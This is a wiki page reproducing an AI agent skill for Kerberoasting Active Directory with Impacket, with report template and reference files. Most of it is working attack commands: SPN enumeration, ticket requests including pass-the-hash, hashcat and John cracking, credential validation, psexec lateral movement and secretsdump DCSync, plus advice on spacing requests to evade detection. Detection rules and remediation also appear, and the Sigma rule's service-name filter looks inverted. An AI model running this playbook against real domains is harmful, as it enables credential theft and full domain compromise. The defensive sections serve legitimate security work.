exploiting-kerberoasting-with-impacket skill (Anthropic-Cybersecurity-Skills)

From Public Agent Wiki
Contents
  1. Install
  2. SKILL.md (verbatim)
  3. Overview
  4. When to Use
  5. Prerequisites
  6. MITRE ATT&CK Mapping
  7. Step 1: Enumerate Kerberoastable Accounts
  8. Step 2: Request TGS Tickets
  9. Step 3: Crack TGS Tickets Offline
  10. Step 4: Validate and Use Cracked Credentials
  11. Alternative Tools
  12. Rubeus (Windows)
  13. PowerView (PowerShell)
  14. Targeted Kerberoasting
  15. Detection
  16. Windows Event Logs
  17. Sigma Rule
  18. Defensive Recommendations
  19. References
  20. Other files in this skill
  21. assets/template.md (verbatim)
  22. Assessment Details
  23. Summary
  24. Kerberoastable Accounts Inventory
  25. Attack Chain
  26. Findings
  27. Finding 1: Kerberoastable Domain Admin Service Account
  28. Finding 2: Multiple Service Accounts with Weak Passwords
  29. Remediation Plan
  30. Immediate (0-48 hours)
  31. Short-Term (1-2 weeks)
  32. Long-Term (1-3 months)
  33. references/api-reference.md (verbatim)
  34. MITRE ATT&CK T1558.003 — Kerberoasting
  35. Attack Flow
  36. Impacket — GetUserSPNs.py
  37. Enumerate SPN Accounts
  38. Request TGS Tickets
  39. With NTLM Hash
  40. Output Format (Hashcat mode 13100)
  41. Rubeus — Windows Kerberoasting
  42. Kerberoast All SPNs
  43. Target Specific User
  44. RC4 Only (weaker, easier to crack)
  45. Hash Cracking
  46. Hashcat
  47. John the Ripper
  48. PowerShell Enumeration
  49. Find SPN Accounts
  50. Request TGS (PowerView)
  51. Detection
  52. Event IDs
  53. Detection Query
  54. Remediation
  55. references/standards.md (verbatim)
  56. MITRE ATT&CK Techniques
  57. Primary Technique
  58. Related Techniques
  59. APT Groups Known to Use Kerberoasting
  60. NIST References
  61. Windows Security Events
  62. Kerberos Encryption Types
  63. CIS Benchmarks
  64. references/workflows.md (verbatim)
  65. Kerberoasting Attack Workflow
  66. Target Prioritization Matrix
  67. Hashcat Command Reference
  68. Detection and Response Workflow

What it does. Performs Kerberoasting (MITRE ATT&CK T1558.003) using Impacket's GetUserSPNs.py to request Kerberos TGS tickets for SPN-registered service accounts, then cracks the extracted RC4/AES-encrypted hashes offline to recover service account credentials. Use during authorized Active Directory penetration tests or red-team engagements for credential access against service accounts via Kerberos ticket-granting-service requests. Part of mukul975/Anthropic-Cybersecurity-Skills (817 security skills) (mukul975/Anthropic-Cybersecurity-Skills).

Upstream mukul975/Anthropic-Cybersecurity-Skills
Skill file skills/exploiting-kerberoasting-with-impacket/SKILL.md
License Apache-2.0 (skill folder LICENSE)
Author mukul975
Fetched 2026-09-10

Install

  • npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-kerberoasting-with-impacket, or copy the skill folder into ~/.claude/skills/exploiting-kerberoasting-with-impacket/.
  • Raw file: curl -sL https://raw.githubusercontent.com/mukul975/Anthropic-Cybersecurity-Skills/HEAD/skills/exploiting-kerberoasting-with-impacket/SKILL.md

SKILL.md (verbatim)

name: exploiting-kerberoasting-with-impacket
description: >-
  Performs Kerberoasting (MITRE ATT&CK T1558.003) using Impacket's GetUserSPNs.py
  to request Kerberos TGS tickets for SPN-registered service accounts, then cracks
  the extracted RC4/AES-encrypted hashes offline to recover service account
  credentials. Use during authorized Active Directory penetration tests or
  red-team engagements for credential access against service accounts via
  Kerberos ticket-granting-service requests.
domain: cybersecurity
subdomain: red-teaming
tags:
- kerberoasting
- impacket
- active-directory
- credential-access
- kerberos
- t1558-003
- service-accounts
version: '1.0'
author: mahipal
license: Apache-2.0
d3fend_techniques:
- Application Protocol Command Analysis
- Network Isolation
- Network Traffic Analysis
- Client-server Payload Profiling
- Network Traffic Community Deviation
nist_csf:
- ID.RA-01
- GV.OV-02
- DE.AE-07
mitre_attack:
- T1595
- T1190
- T1059
- T1078
- T1003

Exploiting Kerberoasting with Impacket

Overview

Kerberoasting (MITRE ATT&CK T1558.003) is a credential access technique that targets Active Directory service accounts by requesting Kerberos TGS (Ticket Granting Service) tickets for accounts with Service Principal Names (SPNs). The TGS ticket is encrypted with the service account's NTLM hash (RC4 or AES), enabling offline brute-force cracking. Impacket's GetUserSPNs.py is the standard tool for Linux-based Kerberoasting attacks.

When to Use

  • When performing authorized security testing that involves exploiting kerberoasting with impacket
  • When analyzing malware samples or attack artifacts in a controlled environment
  • When conducting red team exercises or penetration testing engagements
  • When building detection capabilities based on offensive technique understanding

Prerequisites

  • Valid domain credentials (any domain user can request TGS tickets)
  • Network access to a Domain Controller (TCP/88 Kerberos, TCP/389 LDAP)
  • Impacket installed (pip install impacket)
  • Hashcat or John the Ripper for offline cracking
  • Wordlist (e.g., rockyou.txt, SecLists)

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

MITRE ATT&CK Mapping

Technique ID Name Tactic
T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting Credential Access
T1087.002 Account Discovery: Domain Account Discovery
T1110.002 Brute Force: Password Cracking Credential Access

Step 1: Enumerate Kerberoastable Accounts

# List all user accounts with SPNs (without requesting tickets)
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1

# Output example:
# ServicePrincipalName          Name        MemberOf                          PasswordLastSet
# ----------------------------  ----------  --------------------------------  -------------------
# MSSQLSvc/SQL01.corp.local     svc_sql     CN=Domain Admins,CN=Users,...     2023-01-15 10:30:22
# HTTP/web01.corp.local         svc_web     CN=Web Admins,CN=Users,...        2024-03-20 14:15:00
# HOST/backup01.corp.local      svc_backup  CN=Backup Operators,CN=Users,...  2022-06-01 08:45:10

Step 2: Request TGS Tickets

# Request TGS tickets for all Kerberoastable accounts
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 -request

# Request ticket for a specific SPN
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
  -request-user svc_sql

# Output format (hashcat-compatible):
# $krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/SQL01.corp.local*$abc123...

# Save to file for cracking
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
  -request -outputfile kerberoast_hashes.txt

# Using NTLM hash instead of password (Pass-the-Hash)
GetUserSPNs.py corp.local/jsmith -hashes :aad3b435b51404eeaad3b435b51404ee \
  -dc-ip 10.10.10.1 -request -outputfile hashes.txt

# Request AES tickets (if available)
GetUserSPNs.py corp.local/jsmith:Password123 -dc-ip 10.10.10.1 \
  -request -outputfile hashes.txt

Step 3: Crack TGS Tickets Offline

# Hashcat - RC4 encrypted tickets (mode 13100)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt \
  --rules-file /usr/share/hashcat/rules/best64.rule

# Hashcat - AES-256 encrypted tickets (mode 19700)
hashcat -m 19700 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt

# John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt

# Check results
hashcat -m 13100 kerberoast_hashes.txt --show
# $krb5tgs$23$*svc_sql$CORP.LOCAL$...*$...:Summer2024!

Step 4: Validate and Use Cracked Credentials

# Verify cracked credentials
crackmapexec smb 10.10.10.1 -u svc_sql -p 'Summer2024!' -d corp.local

# Check for local admin access
crackmapexec smb 10.10.10.0/24 -u svc_sql -p 'Summer2024!' -d corp.local --local-auth

# Use credentials for lateral movement
psexec.py corp.local/svc_sql:'Summer2024!'@SQL01.corp.local

# If service account is Domain Admin
secretsdump.py corp.local/svc_sql:'Summer2024!'@10.10.10.1 -just-dc-ntlm

Alternative Tools

Rubeus (Windows)

# Kerberoast all accounts
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Target specific user
.\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql_hash.txt

# Request RC4-only tickets (easier to crack)
.\Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt

# Kerberoast with AES
.\Rubeus.exe kerberoast /aes /outfile:hashes.txt

PowerView (PowerShell)

Import-Module .\PowerView.ps1
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File hashes.txt

Targeted Kerberoasting

High-value targets for Kerberoasting:

Account Type Why Risk
Service accounts in Domain Admins Direct path to domain compromise Critical
SQL service accounts (MSSQLSvc) Often have excessive privileges High
Exchange service accounts Access to all email High
Accounts with AdminCount=1 Previously/currently privileged High
Accounts with old passwords More likely to use weak passwords Medium

Detection

Windows Event Logs

Event ID 4769 - Kerberos Service Ticket Request
- Monitor for: Encryption type 0x17 (RC4-HMAC) when AES is expected
- Monitor for: Single user requesting many TGS tickets in short period
- Monitor for: Service ticket requests from unusual source IPs

Sigma Rule

title: Potential Kerberoasting Activity
status: stable
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4769
        TicketEncryptionType: '0x17'  # RC4
        ServiceName|endswith: '$'
    filter:
        ServiceName: 'krbtgt'
    condition: selection and not filter
level: medium
tags:
    - attack.credential_access
    - attack.t1558.003

Defensive Recommendations

  1. Use Group Managed Service Accounts (gMSA) - 240-character random passwords, auto-rotated
  2. Set strong passwords (25+ chars) on all service accounts
  3. Enable AES-only encryption - Disable RC4 via GPO
  4. Monitor Event ID 4769 for RC4 TGS requests
  5. Implement Managed Service Accounts where gMSA is not feasible
  6. Regular audits - Run BloodHound to identify Kerberoastable accounts
  7. Protected Users group - Add sensitive service accounts
  8. Honeypot SPNs - Create decoy accounts with SPNs to detect attacks

References

Other files in this skill

assets/template.md (verbatim)

Kerberoasting Assessment Report Template

Assessment Details

Field Value
Engagement ID [ID]
Domain [domain.local]
Assessment Date YYYY-MM-DD
Assessor [Name]
Tool Impacket GetUserSPNs v0.11.0

Summary

Metric Value
Total Kerberoastable Accounts XX
Cracked Passwords XX
Privileged Accounts Cracked XX
Domain Admin Compromise Yes/No

Kerberoastable Accounts Inventory

Account SPN Privileged Password Age Cracked Risk
svc_sql MSSQLSvc/SQL01:1433 DA Member 365 days Yes Critical
svc_web HTTP/WEB01 No 180 days Yes High
svc_backup HOST/BACKUP01 Backup Ops 730 days No High
svc_exchange exchangeMDB/EX01 No 90 days No Medium

Attack Chain

1. Obtained domain credentials: jsmith (compromised via phishing)
2. Enumerated SPNs: GetUserSPNs.py corp.local/jsmith:xxx -dc-ip 10.10.10.1
3. Requested TGS tickets: GetUserSPNs.py ... -request -outputfile hashes.txt
4. Cracked offline: hashcat -m 13100 hashes.txt rockyou.txt -r best64.rule
5. Validated credentials: crackmapexec smb DC01 -u svc_sql -p 'cracked_pass'
6. Escalated to DA: svc_sql is member of Domain Admins
7. DCSync: secretsdump.py corp.local/svc_sql:xxx@DC01

Findings

Finding 1: Kerberoastable Domain Admin Service Account

Field Value
Severity Critical (CVSS 9.8)
Account svc_sql@corp.local
SPN MSSQLSvc/SQL01.corp.local:1433
Password Cracked Yes (weak password)
Impact Full domain compromise via DCSync
MITRE ATT&CK T1558.003 -> T1003.006

Remediation:

  1. Immediately reset svc_sql password to 25+ random characters
  2. Remove svc_sql from Domain Admins group
  3. Convert to gMSA: New-ADServiceAccount -Name svc_sql -DNSHostName sql01.corp.local
  4. Disable RC4 encryption for this account

Finding 2: Multiple Service Accounts with Weak Passwords

Field Value
Severity High
Accounts svc_web, svc_iis
Time to Crack < 2 hours
Impact Lateral movement to web servers
MITRE ATT&CK T1558.003

Remediation Plan

Immediate (0-48 hours)

  • Reset all cracked service account passwords
  • Remove unnecessary Domain Admin memberships
  • Disable RC4 encryption via GPO

Short-Term (1-2 weeks)

  • Convert service accounts to gMSA where possible
  • Set 25+ character passwords on remaining service accounts
  • Add sensitive accounts to Protected Users group
  • Deploy Event ID 4769 detection rule in SIEM

Long-Term (1-3 months)

  • Implement quarterly service account password rotation
  • Deploy honeypot SPN accounts
  • Conduct regular BloodHound assessments
  • Implement tiered Active Directory administration model

references/api-reference.md (verbatim)

API Reference: Kerberoasting with Impacket

MITRE ATT&CK T1558.003 — Kerberoasting

Attack Flow

  1. Authenticate to AD with domain user credentials
  2. Query LDAP for accounts with SPNs
  3. Request TGS tickets for those SPNs
  4. Extract ticket hashes
  5. Crack offline with wordlist

Impacket — GetUserSPNs.py

Enumerate SPN Accounts

GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.1

Request TGS Tickets

GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.1 \
    -request -outputfile kerberoast.txt

With NTLM Hash

GetUserSPNs.py domain.local/user -hashes :NTLM_HASH -dc-ip 10.10.10.1 -request

Output Format (Hashcat mode 13100)

$krb5tgs$23$*svc_sql$DOMAIN.LOCAL$...$<hash>

Rubeus — Windows Kerberoasting

Kerberoast All SPNs

Rubeus.exe kerberoast /outfile:hashes.txt

Target Specific User

Rubeus.exe kerberoast /user:svc_sql /outfile:hashes.txt

RC4 Only (weaker, easier to crack)

Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt

Hash Cracking

Hashcat

# Kerberos 5 TGS-REP etype 23 (RC4)
hashcat -m 13100 hashes.txt wordlist.txt

# Kerberos 5 TGS-REP etype 17 (AES-128)
hashcat -m 19600 hashes.txt wordlist.txt

# Kerberos 5 TGS-REP etype 18 (AES-256)
hashcat -m 19700 hashes.txt wordlist.txt

John the Ripper

john --wordlist=wordlist.txt hashes.txt

PowerShell Enumeration

Find SPN Accounts

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} `
    -Properties ServicePrincipalName, PasswordLastSet

Request TGS (PowerView)

Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash

Detection

Event IDs

Event Description
4769 Kerberos Service Ticket Request
4770 Service Ticket Renewed

Detection Query

SecurityEvent
| where EventID == 4769
| where TicketEncryptionType == "0x17"  // RC4
| where ServiceName !endswith "$"
| summarize count() by Account, ServiceName

Remediation

  1. Use Group Managed Service Accounts (gMSA)
  2. Set strong passwords (25+ characters) on SPN accounts
  3. Enable AES encryption for Kerberos (disable RC4)
  4. Monitor Event 4769 for anomalous TGS requests

references/standards.md (verbatim)

Standards and References: Kerberoasting with Impacket

MITRE ATT&CK Techniques

Primary Technique

  • T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting
    • Tactic: Credential Access (TA0006)
    • Platforms: Windows
    • Data Sources: Active Directory (Credential Request), Logon Session (Logon Session Metadata)
    • Detection: MITRE DET0157
  • T1558 - Steal or Forge Kerberos Tickets (parent)
  • T1558.004 - AS-REP Roasting
  • T1558.001 - Golden Ticket
  • T1558.002 - Silver Ticket
  • T1087.002 - Account Discovery: Domain Account
  • T1110.002 - Brute Force: Password Cracking

APT Groups Known to Use Kerberoasting

  • APT29 (Cozy Bear / MITRE G0016)
  • FIN7 (MITRE G0046)
  • Wizard Spider (MITRE G0102)
  • HAFNIUM (MITRE G0125)
  • Sandworm Team (MITRE G0034)

NIST References

  • NIST SP 800-53 Rev. 5 - IA-5: Authenticator Management (strong service account passwords)
  • NIST SP 800-53 Rev. 5 - AC-6: Least Privilege (service account permissions)
  • NIST SP 800-63B - Digital Identity Guidelines (password complexity)
  • NIST SP 800-171 - 3.5.7: Store and transmit only cryptographically-protected passwords

Windows Security Events

Event ID Description Relevance
4769 A Kerberos service ticket was requested Primary detection (check Encryption Type)
4768 A Kerberos authentication ticket (TGT) was requested Correlate with source of TGS requests
4770 A Kerberos service ticket was renewed Renewal of Kerberoasted tickets
4771 Kerberos pre-authentication failed Related: AS-REP Roasting detection

Kerberos Encryption Types

Etype Value Algorithm Crackable Hashcat Mode
0x17 (23) RC4-HMAC Fast cracking 13100
0x11 (17) AES128-CTS-HMAC-SHA1-96 Slower cracking 19600
0x12 (18) AES256-CTS-HMAC-SHA1-96 Slowest cracking 19700

CIS Benchmarks

  • CIS Microsoft Windows Server 2022 - 2.3.6.4: Network security: Configure encryption types for Kerberos
  • CIS Active Directory - Service account management requirements
  • CIS Controls v8 - Control 5.4: Restrict Administrator Privileges to Dedicated Accounts

references/workflows.md (verbatim)

Workflows: Kerberoasting with Impacket

Kerberoasting Attack Workflow

┌─────────────────────────────────────────────────────────────────┐
│                KERBEROASTING ATTACK WORKFLOW                      │
├─────────────────────────────────────────────────────────────────┤
│                                                                  │
│  1. ENUMERATE SPN ACCOUNTS                                       │
│     ├── GetUserSPNs.py (list mode, no -request)                  │
│     ├── Identify high-value targets (DA members, AdminCount)     │
│     ├── Check password age (older = weaker)                      │
│     └── Prioritize targets                                       │
│                                                                  │
│  2. REQUEST TGS TICKETS                                          │
│     ├── GetUserSPNs.py -request -outputfile hashes.txt           │
│     ├── Target specific high-value accounts first                │
│     ├── Request RC4 tickets if possible (faster cracking)        │
│     └── OPSEC: Space out requests to avoid detection             │
│                                                                  │
│  3. OFFLINE CRACKING                                             │
│     ├── hashcat -m 13100 (RC4) or -m 19700 (AES256)             │
│     ├── Use quality wordlists (rockyou, SecLists)                │
│     ├── Apply rules (best64, dive, OneRuleToRuleThemAll)         │
│     └── Use GPU acceleration for faster results                  │
│                                                                  │
│  4. VALIDATE CREDENTIALS                                         │
│     ├── CrackMapExec SMB validation                              │
│     ├── Check access levels (local admin, domain admin)          │
│     ├── Enumerate additional access paths                        │
│     └── Document findings                                        │
│                                                                  │
│  5. LEVERAGE ACCESS                                              │
│     ├── If Domain Admin: DCSync / Golden Ticket                  │
│     ├── If Local Admin: Dump LSASS, pivot laterally              │
│     ├── If standard user: Use for further enumeration            │
│     └── Update BloodHound with newly owned accounts              │
│                                                                  │
└─────────────────────────────────────────────────────────────────┘

Target Prioritization Matrix

Priority Decision Tree
│
├── Is account in Domain Admins group?
│   └── YES → CRITICAL priority → Crack immediately
│
├── Is AdminCount = 1?
│   └── YES → HIGH priority → Currently or previously privileged
│
├── Password last set > 2 years ago?
│   └── YES → HIGH priority → Likely weak/legacy password
│
├── Is account AdminTo any computers?
│   └── YES → MEDIUM priority → Lateral movement opportunity
│
├── Account description contains password hint?
│   └── YES → HIGH priority → Common OPSEC failure
│
└── Standard service account
    └── LOW priority → Crack opportunistically

Hashcat Command Reference

# Basic Kerberoasting crack (RC4)
hashcat -m 13100 hashes.txt wordlist.txt

# With rules
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule

# Multiple wordlists with rules
hashcat -m 13100 hashes.txt wordlist1.txt wordlist2.txt \
  -r rules/OneRuleToRuleThemAll.rule

# AES-256 cracking
hashcat -m 19700 hashes.txt wordlist.txt -r rules/best64.rule

# Brute force (8 chars)
hashcat -m 13100 hashes.txt -a 3 ?a?a?a?a?a?a?a?a

# Show cracked passwords
hashcat -m 13100 hashes.txt --show

Detection and Response Workflow

SOC DETECTION WORKFLOW
│
├── SIEM Alert: Multiple 4769 events with RC4 encryption
│   ├── Check source account - is it a service account?
│   │   └── NO → Potential Kerberoasting
│   ├── Check volume - more than 5 TGS requests in 5 minutes?
│   │   └── YES → High confidence Kerberoasting
│   └── Check encryption type - 0x17 (RC4)?
│       └── YES → Confirm Kerberoasting attempt
│
├── RESPONSE ACTIONS
│   ├── Identify source IP and user account
│   ├── Isolate source system if compromised
│   ├── Reset passwords on all targeted service accounts
│   ├── Check for lateral movement from source
│   └── Review service account permissions
│
└── POST-INCIDENT
    ├── Implement gMSA for targeted accounts
    ├── Disable RC4 encryption via GPO
    ├── Deploy Kerberoasting detection rule
    └── Conduct AD security assessment

Back to mukul975/Anthropic-Cybersecurity-Skills (817 security skills) or Agent skills.